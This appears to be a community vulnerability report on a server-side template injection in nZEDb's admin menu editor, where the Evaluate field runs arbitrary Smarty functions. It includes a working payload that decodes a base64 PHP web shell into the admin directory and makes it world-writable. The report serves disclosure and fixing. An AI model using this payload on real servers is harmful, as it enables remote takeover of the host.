There is a Server Side Template Injection in /admin/menu-edit.php?action=submit, which I'd like to discuss with the community to try and figure out a solution for.

Background

• As an admin nZEDb user, I can add a menu item to an installation of nZEDb by navigating from:
  Home Page -> Admin Panel -> Site Settings -> Menu Items -> Add

And then add to the Evaluate field a smarty expression which triggers code execution on the server

{system('echo PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz4= | base64 -d > /var/www/nZEDb/www/admin/shell.php && chmod 777 /var/www/nZEDb/www/admin/shell.php')}

The above payload drops an example web shell for further exploitation

Expected behaviour

• The Evaluate field is meant to determine if a menu is visible or not. Adding a menu as an admin user should likely not allow you to use Smarty template functions like system() which run arbitrary system commands by design. I understand this might be up for some discussion.

Actual behaviour

• It appears there is no filtering of the functions of the template engine when adding a new menu item. This lets a nZEDb admin user without the ability to run code on the server run arbitrary commands as the user running PHP on the web server.

Steps to reproduce the behaviour

I have created a PoC to demonstrate this along with another vulnerability, which was just patched #2661

https://gitlab.com/cruatta/nzedb-pwn